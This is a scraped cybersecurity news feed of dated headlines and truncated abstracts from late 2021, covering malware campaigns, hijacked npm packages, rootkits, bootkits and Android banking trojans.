This technique is yet another attempt from the malicious actor to hide control channels to avoid being tracked, monitored, or blocked and it probably has served them well.Netlab
November 11, 2021
Careful: ‘Smart TV remote’ Android app on Google Play is malware Full Text
Abstract
Two Android apps sitting on the Google Play store have been found to contain malware this week. These apps are called 'Smart TV remote' and 'Halloween Coloring'.BleepingComputer
November 11, 2021
BazarBackdoor Now Abuses Windows 10 Apps Feature in ‘Call Me Back’ Attack Full Text
Abstract
Researchers from Sophos Labs said the attack was noticed after the firm's own employees were targeted with spam emails. These emails were written with at least a basic level of social engineering.ZDNet
November 10, 2021
Researchers Discover PhoneSpy Malware Spying on South Korean Citizens Full Text
Abstract
An ongoing mobile spyware campaign has been uncovered snooping on South Korean residents using a family of 23 malicious Android apps to siphon sensitive information and gain remote control of the devices. "With more than a thousand South Korean victims, the malicious group behind this invasive campaign has had access to all the data, communications, and services on their devices," Zimperium researcher Aazim Yaswant said. "The victims were broadcasting their private information to the malicious actors with zero indication that something was amiss." The Dallas-based mobile security company dubbed the campaign " PhoneSpy ." Zimperium did not attribute the spyware to a known threat actor. "The evidence surrounding PhoneSpy shows a familiar framework that has been passed around for years, updated by individuals and shared within private communities and back channels until assembled into what we see in this variation today," Richard Melick, the coThe Hacker News
November 10, 2021
New Android malware targets Netflix, Instagram, and Twitter users Full Text
Abstract
A new Android malware known as MasterFred uses fake login overlays to steal the credit card information of Netflix, Instagram, and Twitter users.BleepingComputer
November 10, 2021
These invisible characters could be hidden backdoors in your JS code Full Text
Abstract
Could malicious backdoors be hiding in your code, that otherwise appears perfectly clean to the human eye and text editors alike? A security researcher has shed light on how invisible characters can be snuck into JavaScript code to introduce security risks, like backdoors, into your software.BleepingComputer
November 08, 2021
Experts Detail Malicious Code Dropped Using ManageEngine ADSelfService Exploit Full Text
Abstract
At least nine entities across the technology, defense, healthcare, energy, and education industries were compromised by leveraging a recently patched critical vulnerability in Zoho's ManageEngine ADSelfService Plus self-service password management and single sign-on (SSO) solution. The spying campaign, which was observed starting September 22, 2021, involved the threat actor taking advantage of the flaw to gain initial access to targeted organizations, before moving laterally through the network to carry out post-exploitation activities by deploying malicious tools designed to harvest credentials and exfiltrate sensitive information via a backdoor. "The actor heavily relies on the Godzilla web shell, uploading several variations of the open-source web shell to the compromised server over the course of the operation," researchers from Palo Alto Networks' Unit 42 threat intelligence team said in a report. "Several other tools have novel characteristics or haThe Hacker News
November 07, 2021
Two NPM Packages With 22 Million Weekly Downloads Found Backdoored Full Text
Abstract
In what's yet another instance of supply chain attack targeting open-source software repositories, two popular NPM packages with cumulative weekly downloads of nearly 22 million were found to be compromised with malicious code by gaining unauthorized access to the respective developer's accounts. The two libraries in question are " coa ," a parser for command-line options, and " rc ," a configuration loader, both of which were tampered by an unidentified threat actor to include "identical" password-stealing malware. All versions of coa starting with 2.0.3 and above — 2.0.3, 2.0.4, 2.1.1, 2.1.3, 3.0.1, and 3.1.3 — are impacted, and users of the affected versions are advised to downgrade to 2.0.2 as soon as possible and check their systems for suspicious activity, according to a GitHub advisory published on November 4. In a similar vein, versions 1.2.9, 1.3.9, and 2.3.9 of rc have been found laced with malware, with an independent alert uThe Hacker News
November 5, 2021
npm libraries coa and rc. have been hijacked to deliver password-stealing malware Full Text
Abstract
Two popular npm libraries, coa and rc., have been hijacked, threat actors replaced them with versions laced with password-stealing malware. The security team of the npm JavaScript package warns that two popular npm libraries, coa and rc., have...Security Affairs
November 04, 2021
Popular ‘coa’ NPM library hijacked to steal user passwords Full Text
Abstract
Popular npm library 'coa' was hijacked today with malicious code injected into it, ephemerally impacting React pipelines around the world. The 'coa' library, short for Command-Option-Argument, receives about 9 million weekly downloads on npm, and is used by almost 5 million open source repositories on GitHub.BleepingComputer
November 3, 2021
Mekotio Banking Trojan Resurges with Tweaked Code, Stealthy Campaign Full Text
Abstract
The banker, aka Metamorfo, is roaring back after Spanish police arrested more than a dozen gang members.Threatpost
November 03, 2021
Mekotio Banking Trojan Resurfaces with New Attacking and Stealth Techniques Full Text
Abstract
The operators behind the Mekotio banking trojan have resurfaced with a shift in its infection flow so as to stay under the radar and evade security software, while staging nearly 100 attacks over the last three months. "One of the main characteristics […] is the modular attack which gives the attackers the ability to change only a small part of the whole in order to avoid detection," researchers from Check Point Research said in a report shared with The Hacker News. The latest wave of attacks are said to primarily target victims located in Brazil, Chile, Mexico, Peru, and Spain. The development comes after Spanish law enforcement agencies in July 2021 arrested 16 individuals belonging to a criminal network in connection with operating Mekotio and another banking malware called Grandoreiro as part of a social engineering campaign targeting financial institutions in Europe. The evolved version of the Mekotio malware strain is designed for compromising Windows systems witThe Hacker News
November 03, 2021
Stealthier version of Mekotio banking trojan spotted in the wild Full Text
Abstract
A new version of a banking trojan known as Mekotio is being deployed in the wild, with malware analysts reporting that it's using a new, stealthier infection flow.BleepingComputer
November 03, 2021
BlackMatter ransomware claims to be shutting down due to police pressure Full Text
Abstract
The BlackMatter ransomware is allegedly shutting down its operation due to pressure from the authorities and recent law enforcement operations.BleepingComputer
November 2, 2021
Trojan Source attack method allows hiding flaws in source code Full Text
Abstract
Researchers devised a new attack method called 'Trojan Source' that allows hide vulnerabilities into the source code of a software project. Trojan Source is a new attack technique demonstrated by a group of Cambridge researchers that can allow threat...Security Affairs
November 1, 2021
‘Trojan Source’ Hides Invisible Bugs in Source Code Full Text
Abstract
The old RLO trick of exploiting how Unicode handles script ordering and a related homoglyph attack can imperceptibly switch the real name of malware.Threatpost
November 01, 2021
New ‘Trojan Source’ Technique Lets Hackers Hide Vulnerabilities in Source Code Full Text
Abstract
A novel class of vulnerabilities could be leveraged by threat actors to inject visually deceptive malware in a way that's semantically permissible but alters the logic defined by the source code, effectively opening the door to more first-party and supply chain risks. Dubbed " Trojan Source attacks ," the technique "exploits subtleties in text-encoding standards such as Unicode to produce source code whose tokens are logically encoded in a different order from the one in which they are displayed, leading to vulnerabilities that cannot be perceived directly by human code reviewers," Cambridge University researchers Nicholas Boucher and Ross Anderson said in a newly published paper. The vulnerabilities — tracked as CVE-2021-42574 and CVE-2021-42694 — affect compilers of all popular programming languages such as C, C++, C#, JavaScript, Java, Rust, Go, and Python. Compilers are programs that translate high-level human-readable source code into their lower-lThe Hacker News
October 31, 2021
Rogue QR Codes Steal Microsoft Credentials and Crypto Funds Full Text
Abstract
Recently, researchers uncovered an email-based phishing scam containing QR codes in a bid to steal users’ Microsoft credentials and other data.Cyware Alerts - Hacker News
October 29, 2021
This New Android Malware Can Gain Root Access to Your Smartphones Full Text
Abstract
An unidentified threat actor has been linked to a new Android malware strain that features the ability to root smartphones and take complete control over infected smartphones while simultaneously taking steps to evade detection. The malware has been named " AbstractEmu " owing to its use of code abstraction and anti-emulation checks undertaken to thwart analysis right from the moment the apps are opened. Notably, the global mobile campaign is engineered to target and infect as many devices as possible indiscriminately. Lookout Threat Labs said it found a total of 19 Android applications that posed as utility apps and system tools like password managers, money managers, app launchers, and data saving apps, seven of which contained the rooting functionality. Only one of the rogue apps, called Lite Launcher, made its way to the official Google Play Store, attracting a total of 10,000 downloads before it was purged. The apps are said to have been prominently distributed viaThe Hacker News
October 29, 2021
Snake malware biting hard on 50 apps for only $25 Full Text
Abstract
Cybercriminals are flooding to use the Snake password-stealing trojan, making it one of the popular malware families used in attacks.BleepingComputer
October 28, 2021
TrickBot malware dev extradited to U.S. faces 60 years in prison Full Text
Abstract
A Russian national believed to be a member of the TrickBot malware development team has been extradited to the U.S. and is currently facing charges that could get him 60 years in prison.BleepingComputer
October 28, 2021
New Wslink Malware Loader Runs as a Server and Executes Modules in Memory Full Text
Abstract
Cybersecurity researchers on Wednesday took the wraps off a "simple yet remarkable" malware loader for malicious Windows binaries targeting Central Europe, North America and the Middle East. Codenamed " Wslink " by ESET, this previously undocumented malware stands apart from the rest in that it runs as a server and executes received modules in memory. There are no specifics available on the initial compromise vector and there are no code or operational overlaps that tie this tool to a known threat actor group. The Slovak cybersecurity firm noted that it has seen only a handful of detections in the past two years, suggesting that it could be used in highly-targeted cyber infiltrations. Wslink is designed to run as a service and can accept encrypted portal executable (PE) files from a specific IP address, which is then decrypted and loaded into memory prior to the execution. To achieve this, the client (i.e., the victim) and the server perform a handshake that inThe Hacker News
October 28, 2021
Wslink, a previously undescribed loader for Windows binaries Full Text
Abstract
ESET researchers discovered a previously undescribed loader for Windows binaries, tracked as Wslink, that runs as a server and executes modules in memory. ESET researchers discovered Wslink, a previously undescribed loader for Windows binaries that,...Security Affairs
October 28, 2021
Malicious NPM Libraries Caught Installing Password Stealer and Ransomware Full Text
Abstract
Malicious actors have yet again published two more typosquatted libraries to the official NPM repository that mimic a legitimate package from Roblox, the game company, with the goal of distributing stealing credentials, installing remote access trojans, and infecting the compromised systems with ransomware. The bogus packages — named " noblox.js-proxy " and " noblox.js-proxies " — were found to impersonate a library called " noblox.js ," a Roblox game API wrapper available on NPM and boasts of nearly 20,000 weekly downloads, with each of the poisoned libraries, downloaded a total of 281 and 106 times respectively. According to Sonatype researcher Juan Aguirre, who discovered the malicious NPM packages, the author of noblox.js-proxy first published a benign version that was later tampered with the obfuscated text, in reality, a Batch (.bat) script, in the post-installation JavaScript file. This Batch script, in turn, downloads malicious executablesThe Hacker News
October 28, 2021
AbstractEmu, a new Android malware with rooting capabilities Full Text
Abstract
AbstractEmu is a new Android malware that can root infected devices to take complete control and evade detection with different tricks. Security researchers at the Lookout Threat Labs have discovered a new Android malware, dubbed AbstractEmu,...Security Affairs
October 28, 2021
New AbstractEmu malware roots Android devices, evades detection Full Text
Abstract
New Android malware can root infected devices to take complete control and silently tweak system settings, as well as evade detection using code abstraction and anti-emulation checks.BleepingComputer
October 27, 2021
Hackers Using Squirrelwaffle Loader to Deploy Qakbot and Cobalt Strike Full Text
Abstract
A new spam email campaign has emerged as a conduit for a previously undocumented malware loader that enables the attackers to gain an initial foothold into enterprise networks and drop malicious payloads on compromised systems. "These infections are also used to facilitate the delivery of additional malware such as Qakbot and Cobalt Strike, two of the most common threats regularly observed targeting organizations around the world," said researchers with Cisco Talos in a technical write-up. The malspam campaign is believed to have commenced in mid-September 2021 via laced Microsoft Office documents that, when opened, triggers an infection chain that leads to the machines getting infected with a malware dubbed SQUIRRELWAFFLE . Mirroring a technique that's consistent with other phishing attacks of this kind, the latest operation leverages stolen email threads to give it a veil of legitimacy and trick unsuspecting users into opening the attachments. What's more, tThe Hacker News
October 27, 2021
Malicious NPM libraries install ransomware, password stealer Full Text
Abstract
Malicious NPM packages pretending to be Roblox libraries are delivering ransomware and password-stealing trojans on unsuspecting users.BleepingComputer
October 26, 2021
SquirrelWaffle Loader Malspams, Packing Qakbot, Cobalt Strike Full Text
Abstract
Say hello to what could be the next big spam player: SquirrelWaffle, which is spreading with increasing frequency via spam campaigns and infecting systems with a new malware loader.Threatpost
October 26, 2021
Spammers use Squirrelwaffle malware to drop Cobalt Strike Full Text
Abstract
A new malware threat named Squirrelwaffle has emerged in the wild, supporting actors with an initial foothold and a way to drop malware onto compromised systems and networks.BleepingComputer
October 26, 2021
Magnitude EK Exploiting Chromium-based Browser Flaws Full Text
Abstract
After Internet Explorer, Magnitude Exploit Kit has been observed infecting Chromium-based browsers running on Windows OS in a series of attacks. It abuses two flaws: the first one is a remote code execution issue and the other is a privilege escalation bug. Researchers recommend ensuring timely pat ... Read MoreCyware Alerts - Hacker News
October 26, 2021
Malicious Firefox Add-ons Block Browser From Downloading Security Updates Full Text
Abstract
Mozilla on Monday disclosed it blocked two malicious Firefox add-ons installed by 455,000 users that were found misusing the Proxy API to impede downloading updates to the browser. The two extensions in question, named Bypass and Bypass XM, "interfered with Firefox in a way that prevented users who had installed them from downloading updates, accessing updated blocklists, and updating remotely configured content," Mozilla's Rachel Tublitz and Stuart Colville said . Because Proxy API can be used to proxy web requests, an abuse of the API could enable a bad actor to control the manner Firefox browser connects to the internet effectively. In addition to blocking the extensions to prevent installation by other users, Mozilla said it's pausing on approvals for new add-ons that use the proxy API until the fixes are broadly available. What's more, the California-based non-profit said it'd deployed a system add-on named " Proxy Failover " that shipsThe Hacker News
October 26, 2021
Brutal WordPress plugin bug allows subscribers to wipe sites Full Text
Abstract
A high severity security flaw found in a WordPress plugin with more than 8,000 active installs can let authenticated attackers reset and wipe vulnerable websites.BleepingComputer
October 26, 2021
SquirrelWaffle Malware Family Leverages Malspam Emails to Deliver Qakbot, Cobalt Strike Full Text
Abstract
It provides threat actors with an initial foothold that can be used to facilitate further compromise or other malware infections depending on how attackers choose to attempt to monetize their access.Cisco Talos
October 25, 2021
Mozilla blocks malicious add-ons installed by 455K Firefox users Full Text
Abstract
Mozilla blocked malicious Firefox add-ons installed by roughly 455,000 users after discovering in early June that they were abusing the proxy API to block Firefox updates.BleepingComputer
October 23, 2021
Malicious Packages Disguised as JavaScript Libraries Found Full Text
Abstract
Researchers at open-source software firm Sonatype have uncovered multiple malicious packages that disguise themselves as legitimate JavaScript libraries on npm registries to launch cryptominers on Windows, macOS and Linux machines.Gov Info Security
October 22, 2021
Microsoft: WizardUpdate Mac malware adds new evasion tactics Full Text
Abstract
Microsoft says it found new variants of macOS malware known as WizardUpdate (also tracked as UpdateAgent or Vigram), updated to use new evasion and persistence tactics.BleepingComputer
October 22, 2021
Researchers Discover Microsoft-Signed FiveSys Rootkit in the Wild Full Text
Abstract
A newly identified rootkit has been found with a valid digital signature issued by Microsoft that's used to proxy traffic to internet addresses of interest to the attackers for over a year targeting online gamers in China. Bucharest-headquartered cybersecurity technology company Bitdefender named the malware " FiveSys ," calling out its possible credential theft and in-game-purchase hijacking motives. The Windows maker has since revoked the signature following responsible disclosure. "Digital signatures are a way of establishing trust," Bitdefender researchers said in a white paper, adding "a valid digital signature helps the attacker navigate around the operating system's restrictions on loading third-party modules into the kernel. Once loaded, the rootkit allows its creators to gain virtually unlimited privileges." Rootkits are both evasive and stealthy as they offer threat actors an entrenched foothold onto victims' systems and concealThe Hacker News
October 22, 2021
FiveSys, a new digitally-signed rootkit spotted by Bitdefender experts Full Text
Abstract
Bitdefender researchers discovered a new Rootkit named FiveSys that abuses Microsoft-Issued Digital Signature signature to evade detection. FiveSys is a new rootkit discovered by researchers from Bitdefender, it is able to evade detection by abusing...Security Affairs
October 21, 2021
RAT malware spreading in Korea through webhards and torrents Full Text
Abstract
An ongoing malware distribution campaign targeting South Korea is disguising RATs (remote access trojans) as an adult game shared via webhards and torrents.BleepingComputer
October 19, 2021
A New Variant of FlawedGrace Spreading Through Mass Email Campaigns Full Text
Abstract
Cybersecurity researchers on Tuesday took the wraps off a mass volume email attack staged by a prolific cybercriminal gang affecting a wide range of industries, with one of its region-specific operations notably targeting Germany and Austria. Enterprise security firm Proofpoint tied the malware campaign with high confidence to TA505 , which is the name assigned to the financially motivated threat group that's been active in the cybercrime business since at least 2014, and is behind the infamous Dridex banking trojan and other arsenals of malicious tools such as FlawedAmmyy, FlawedGrace, Neutrino botnet, and Locky ransomware, among others. The attacks are said to have started as a series of low-volume email waves, delivering only several thousand messages in each phase, before ramping up in late September and as recently as October 13, resulting in tens to hundreds of thousands of emails. "Many of the campaigns, especially the large volume ones, strongly resemble the hisThe Hacker News
October 18, 2021
Bugs in malware create ‘backdoors’ for security researchers Full Text
Abstract
New research from cloud security firm Zscaler, presented at the recent VB2021 conference, exploits bugs and coding errors in malware code to thwart infections by botnets, ransomware, and trojans.The Daily Swig
October 18, 2021
Experts spotted an Ad-Blocking Chrome extension injecting malicious ads Full Text
Abstract
Researchers warn of an Ad-Blocking Chrome extension that was abused by threat actors to Injecting Ads in Google search pages. Researchers from Imperva have spotted a new deceptive ad injection campaign that is targeting users of some large websites...Security Affairs
October 17, 2021
Fake Android Apps Steal Credentials from Japanese Telecom Users Full Text
Abstract
An Android-based phishing campaign was observed targeting customers of telecommunication services based in Japan. The malware-laced fake app steals credentials and session cookies. Experts recommend bypass such risks by avoiding apps downloads from unknown third-party stores.Cyware Alerts - Hacker News
October 15, 2021
Ad-Blocking Chrome Extension Caught Injecting Ads in Google Search Pages Full Text
Abstract
A new deceptive ad injection campaign has been found leveraging an ad blocker extension for Google Chrome and Opera web browsers to sneakily insert ads and affiliate codes on websites, according to new research from cybersecurity firm Imperva. The findings come following the discovery of rogue domains distributing an ad injection script in late August 2021 that the researchers connected to an add-on called AllBlock. The extension has since been pulled from both the Chrome Web Store and Opera add-ons marketplaces. While AllBlock is designed to block ads legitimately, the JavaScript code is injected into every new tab opened on the browser. It works by identifying and sending all links in a web page — typically on search engine results pages — to a remote server, which responds back with a list of websites to replace the genuine links with, leading to a scenario where upon clicking a link, the victim is redirected to a different page. "When the user clicks on any modified liThe Hacker News
October 15, 2021
Adblocker promises to blocks ads, injects them instead Full Text
Abstract
Researchers at Imperva uncovered a new ad injection campaign based on an adblocker named AllBlock. The AllBlock extension was available at the time of writing for Chrome and Opera in the respective web stores.Malwarebytes Labs
October 14, 2021
Malicious Chrome ad blocker injects ads behind the scenes Full Text
Abstract
The AllBlock Chromium ad blocking extension has been found to be injecting hidden affiliate links that generate commissions for the developers.BleepingComputer
October 13, 2021
New FontOnLake Malware Cripples Linux Systems Full Text
Abstract
ESET unearthed a new malware strain, dubbed FontOnLake, that targets Linux systems and appears to have claimed a limited number of victims in Southeast Asia. The malware appears to boast sneaky nature and advanced designs. Security teams are suggested to proactively prepare their defenses against ... Read MoreCyware Alerts - Hacker News
October 13, 2021
Brizy WordPress Plugin Exploit Chains Allow Full Site Takeovers Full Text
Abstract
A stored XSS and arbitrary file-upload bug can be paired with an authorization bypass to wreak havoc.Threatpost
October 12, 2021
There is Lot More About Fake iTerm2 Apps than Thought Earlier Full Text
Abstract
Trend Micro sheds light on the ZuRu malware campaign that collects private data from a victim’s machine. Further analysis of the fake iTerm2 app’s Apple Distribution certificate led to the discovery of more trojanized apps on VirusTotal. S tay vigilant while downloading software online from untrus ... Read MoreCyware Alerts - Hacker News
October 12, 2021
New UEFI Bootkit Performs Espionage Full Text
Abstract
A new ESPecter bootkit was uncovered that performs cyberespionage and compromises system partitions. There are signs in the malware's components that revealed that the attackers could be Chinese-speaking. For protection, experts suggest ensuring security patches quickly.Cyware Alerts - Hacker News
October 12, 2021
Photo editor Android app STILL sitting on Google Play store is malware Full Text
Abstract
An Android app sitting on the Google Play store touts itself to be a photo editor app. But, it contains code that steals the user's Facebook credentials to potentially run ad campaigns on the user's behalf, with their payment information. The app has scored over 5K installs, with similar spyware apps having 500K+ installs.BleepingComputer
October 10, 2021
FontOnLake malware infects Linux systems via trojanized utilities Full Text
Abstract
A newly discovered malware family has been infecting Linux systems concealed in legitimate binaries. Dubbed FontOnLake, the threat delivers backdoor and rootkit components.BleepingComputer
October 08, 2021
Researchers Warn of FontOnLake Rootkit Malware Targeting Linux Systems Full Text
Abstract
Cybersecurity researchers have detailed a new campaign that likely targets entities in Southeast Asia with a previously unrecognized Linux malware that's engineered to enable remote access to its operators, in addition to amassing credentials and function as a proxy server. The malware family, dubbed " FontOnLake " by Slovak cybersecurity firm ESET, is said to feature "well-designed modules" that are continuously being upgraded with new features, indicating an active development phase. Samples uploaded to VirusTotal point to the possibility that the very first intrusions utilizing this threat have been happening as early as May 2020. Avast and Lacework Labs are tracking the same malware under the moniker HCRootkit. "The sneaky nature of FontOnLake's tools in combination with advanced design and low prevalence suggest that they are used in targeted attacks," ESET researcher Vladislav Hrčka said . "To collect data or conduct other malicThe Hacker News
October 07, 2021
Vidar stealer abuses Mastodon to silently get C2 configuration Full Text
Abstract
The Vidar stealer has returned in a new campaign that abuses the Mastodon social media network to get C2 configuration without raising alarms.BleepingComputer
October 6, 2021
ESPecter Bootkit Malware Haunts Victims with Persistent Espionage Full Text
Abstract
The rare UEFI bootkit drops a fully featured backdoor on PCs and gains the ultimate persistence by modifying the Windows Boot Manager.Threatpost
October 6, 2021
Mana Tools: A Malware C2 Panel with a Past Full Text
Abstract
Mana Tools was first reported in 2019 by Yoroi researchers who identified it as a fork of the AzoRult 3.2 malware created by a Pakistani actor named Aqib Waseem, better known as Hagga.Risk IQ
October 5, 2021
FinFisher is One of the Stealthiest Malware: Kaspersky Full Text
Abstract
Kaspersky laid bare a n eight-month-long investigation into FinSpy operations, revealing multiple insights about the new upgrades in the spyware. Using bootkits, attackers are able to control operating systems' boot process and disable the defenses by evading the Secure Boot mechanism of the sys ... Read MoreCyware Alerts - Hacker News
October 05, 2021
Researchers Discover UEFI Bootkit Targeting Windows Computers Since 2012 Full Text
Abstract
Cybersecurity researchers on Tuesday revealed details of a previously undocumented UEFI (Unified Extensible Firmware Interface) bootkit that has been put to use by threat actors to backdoor Windows systems as early as 2012 by modifying a legitimate Windows Boot Manager binary to achieve persistence, once again demonstrating how technology meant to secure the environment prior to loading the operating system is increasingly becoming a "tempting target." Slovak cybersecurity firm ESET codenamed the new malware "ESPecter" for its ability to persist on the EFI System Partition ( ESP ), in addition to circumventing Microsoft Windows Driver Signature Enforcement to load its own unsigned driver that can be used to facilitate espionage activities such as document theft, keylogging, and screen monitoring by periodically capturing screenshots. "ESPecter shows that threat actors are relying not only on UEFI firmware implants when it comes to pre-OS persistence and,The Hacker News
October 5, 2021
Analyzing LockBit’s Data Exfiltration Model Full Text
Abstract
Yoroi Malware ZLAB analyzed the new working model of LockBit 2.0 that has recently developed its custom tool specialized in data exfiltration. The RaaS group has been helping its partners by providing StealBit data exfiltration service. With the proliferation of such tools, protecting sensitiv ... Read MoreCyware Alerts - Hacker News
October 05, 2021
New UEFI bootkit used to backdoor Windows devices since 2012 Full Text
Abstract
A newly discovered and previously undocumented UEFI (Unified Extensible Firmware Interface) bootkit has been used by attackers to backdoor Windows systems by hijacking the Windows Boot Manager since at least 2012.BleepingComputer
October 4, 2021
Encrypted & Fileless Malware Sees Big Growth Full Text
Abstract
An analysis of second-quarter malware trends shows that threats are becoming stealthier.Threatpost
October 4, 2021
TA544 group behind a spike in Ursnif malware campaigns targeting Italy Full Text
Abstract
Proofpoint researchers have discovered a new Ursnif baking Trojan campaign carried out by a group tracked as TA544 that is targeting organizations in Italy. The experts observed nearly 20 notable campaigns.Security Affairs
October 2, 2021
Flubot Android banking Trojan spreads via fake security updates Full Text
Abstract
The Flubot Android malware is now leveraging fake security updates warning to trick users into installing the malicious code. Threat actors behind the Flubot Android malware are now leveraging fake security updates to trick victims into installing...Security Affairs
October 2, 2021
Password-stealing Android malware uses sneaky security warning to trick you into downloading Full Text
Abstract
FluBot attacks have commonly come in the form of text messages which claim the recipient has missed a delivery, asking them to click a link to install an app to organize a redelivery. This app installs the malware.ZDNet
October 1, 2021
Hydra Android trojan campaign targets customers of European banks Full Text
Abstract
Experts warn of a new Hydra banking trojan campaign targeting European e-banking platform users, including the customers of Commerzbank. Experts warn of a malware campaign targeting European e-banking platform users with the Hydra banking trojan....Security Affairs
October 01, 2021
Flubot Android malware now spreads via fake security updates Full Text
Abstract
The Flubot malware has switched to a new and likely more effective lure to compromise Android devices, now trying to trick its victims into infecting themselves with the help of fake security updates warning them of Flubot infections.BleepingComputer
October 01, 2021
Hydra malware targets customers of Germany’s second largest bank Full Text
Abstract
The Hydra banking trojan is back to targeting European e-banking platform users, and more specifically, customers of Commerzbank, Germany's second-largest financial institution.BleepingComputer
October 01, 2021
Beware of Fake Amnesty International Antivirus for Pegasus that Hacks PCs with Malware Full Text
Abstract
In yet another indicator of how hacking groups are quick to capitalize on world events and improvise their attack campaigns for maximum impact, threat actors have been discovered impersonating Amnesty International to distribute malware that purports to be security software designed to safeguard against NSO Group's Pegasus surveillanceware. "Adversaries have set up a phony website that looks like Amnesty International's — a human rights-focused non-governmental organization — and points to a promised antivirus tool to protect against the NSO Group's Pegasus tool," Cisco Talos researchers said . "However, the download actually installs the little-known Sarwent malware." The countries most affected by the campaign include the U.K., the U.S., Russia, India, Ukraine, Czech Republic, Romania, and Colombia. While it's unclear as to how the victims are lured into visiting the fake Amnesty International website, the cybersecurity firm surmised the attaThe Hacker News
September 30, 2021
Revived Mirai Variant Now Targets a Zero-Day in Ruijie Routers Full Text
Abstract
Mirai_ptea_Rimasuta, an old and unpopular variant of Mirai, has resurfaced to exploit a zero-day vulnerability in RUIJIE router devices. Hacker have redesigned encryption algorithm and C2 communication protocol; it uses the TEA algorithm and encrypts other sensitive resource info. Users are su ... Read MoreCyware Alerts - Hacker News
September 30, 2021
Gaming Platforms Face a Major Threat from BloodyStealer Full Text
Abstract
Kaspersky uncovered a new trojan called BloodyStealer aimed at gamers' accounts on EA Origin, Steam, Epic Games, GOG, and other services. Since its discovery, BloodyStealer has already targeted users based in Latin America, Asia Pacific, and Europe. This latest development indicates the rapid pac ... Read MoreCyware Alerts - Hacker News
September 30, 2021
GhostEmperor: From ProxyLogon to kernel mode Full Text
Abstract
GhostEmperor uses a formerly unknown Windows kernel mode rootkit dubbed Demodex and a sophisticated multi-stage malware framework aimed at providing remote control over the attacked servers.Kaspersky Labs
September 30, 2021
Mac Users Targeted by Trojanized iTerm2 App Full Text
Abstract
When this app is executed, it downloads and runs a malicious Python script. This malware, which Trend Micro has detected as TrojanSpy.Python.ZURU.A, collects private data from a victim’s machine.Trend Micro
September 29, 2021
Beware! This Android Trojan Stole Millions of Dollars from Over 10 Million Users Full Text
Abstract
A newly discovered "aggressive" mobile campaign has infected north of 10 million users from over 70 countries via seemingly innocuous Android apps that subscribe the individuals to premium services costing €36 (~$42) per month without their knowledge. Zimperium zLabs dubbed the malicious trojan " GriftHorse ." The money-making scheme is believed to have been under active development starting from November 2020, with victims reported across Australia, Brazil, Canada, China, France, Germany, India, Russia, Saudi Arabia, Spain, the U.K., and the U.S. No fewer than 200 trojan applications were used in the campaign, making it one of the most widespread scams to have been uncovered in 2021. What's more, the malicious apps catered to a varied set of categories ranging from Tools and Entertainment to Personalization, Lifestyle, and Dating, effectively widening the scale of the attacks. One of the apps, Handy Translator Pro, amassed as much as 500,000 downloads. &quThe Hacker News
September 29, 2021
GriftHorse malware infected more than 10 million Android phones from 70 countries Full Text
Abstract
Security researchers uncovered a massive malware operation, dubbed GriftHorse, that has already infected more than 10 million Android devices worldwide. Security researchers from Zimperium have uncovered a piece of malware, dubbed GriftHorse, that...Security Affairs
September 29, 2021
New FinSpy Malware Variant Infects Windows Systems With UEFI Bootkit Full Text
Abstract
Commercially developed FinFisher surveillanceware has been upgraded to infect Windows devices using a UEFI (Unified Extensible Firmware Interface) bootkit that leverages a trojanized Windows Boot Manager, marking a shift in infection vectors that allow it to elude discovery and analysis. Detected in the wild since 2011, FinFisher (aka FinSpy or Wingbird) is a spyware toolset for Windows, macOS, and Linux developed by Anglo-German firm Gamma International and supplied exclusively to law enforcement and intelligence agencies. But like with NSO Group's Pegasus, the software has also been used to spy on Bahraini activists in the past allegedly and delivered as part of spear-phishing campaigns in September 2017. FinFisher is equipped to harvest user credentials, file listings, sensitive documents, record keystrokes, siphon email messages from Thunderbird, Outlook, Apple Mail, and Icedove, intercept Skype contacts, chats, calls and transferred files, and capture audio and videoThe Hacker News
September 29, 2021
Experts observed for the first time FinFisher infections involving usage of a UEFI bootkit Full Text
Abstract
Experts spotted a new variant of the FinFisher surveillance spyware that is able to hijack and replace the Windows UEFI bootloader to infect Windows machines. Malware researchers at Kaspersky have spotted a new improvement of the infamous commercial...Security Affairs
September 29, 2021
New Android malware steals millions after infecting 10M phones Full Text
Abstract
A large-scale malware campaign has infected more than 10 million Android devices from over 70 countries and likely stole hundreds of millions from its victims by subscribing to paid services without their knowledge.BleepingComputer
September 29, 2021
DoppelDridex Delivered via Slack and Discord Full Text
Abstract
Several recent phishing campaigns have attempted to deliver a variant of the Dridex banking trojan that is named as DoppelDridex, via payloads staged on Slack and Discord CDNs.Security Soup
September 29, 2021
GriftHorse Android Trojan Steals Millions from Over 10 Million Victims Globally Full Text
Abstract
Forensic evidence of this active Android Trojan attack, which Zimperium researchers have named GriftHorse, suggests that the threat group has been running this campaign since November 2020.Zimperium
September 28, 202
FinFisher malware hijacks Windows Boot Manager with UEFI bootkit Full Text
Abstract
Commercially developed FinFisher malware now can infect Windows devices using a UEFI bootkit that it injects in the Windows Boot Manager.BleepingComputer
September 28, 2021
New BloodyStealer Trojan Steals Gamers’ Epic Games and Steam Accounts Full Text
Abstract
A new advanced trojan sold on Russian-speaking underground forums comes with capabilities to steal users' accounts on popular online video game distribution services, including Steam, Epic Games Store, and EA Origin, underscoring a growing threat to the lucrative gaming market. Cybersecurity firm Kaspersky, which coined the malware " BloodyStealer ," said it first detected the malicious tool in March 2021 as being advertised for sale at an attractive price of 700 RUB (less than $10) for one month or $40 for a lifetime subscription. Attacks using Bloody Stealer have been uncovered so far in Europe, Latin America, and the Asia-Pacific region. "BloodyStealer is a Trojan-stealer capable of gathering and exfiltrating various types of data, for cookies, passwords, forms, banking cards from browsers, screenshots, log-in memory, and sessions from various applications," the company said . The information harvested from gaming apps, such as Bethesda, Epic Games, GOG,The Hacker News
September 28, 2021
Gamers Beware: Malware Hunts Steam, Epic and EA Origin Accounts Full Text
Abstract
The BloodyStealer trojan helps cyberattackers go after in-game goods and credits.Threatpost
September 28, 2021
ERMAC, a new banking Trojan that borrows the code from Cerberus malware Full Text
Abstract
ERMAC is a new Android banking Trojan that can steal financial data from 378 banking and wallet apps. Researchers from Threatfabric found in July a new Android banking trojan dubbed ERMAC that is almost fully based on the popular banking trojan Cerberus....Security Affairs
September 28, 2021
New BloodyStealer malware is targeting the gaming sector Full Text
Abstract
Researchers spotted a new malware, dubbed BloodyStealer, that could allow stealing accounts for multiple gaming platforms. Researchers from Kaspersky have spotted a new malware dubbed BloodyStealer that is being used by threat actors to steal accounts...Security Affairs
September 28, 2021
Mirai_ptea_Rimasuta variant is exploiting a new RUIJIE router 0 day to spread Full Text
Abstract
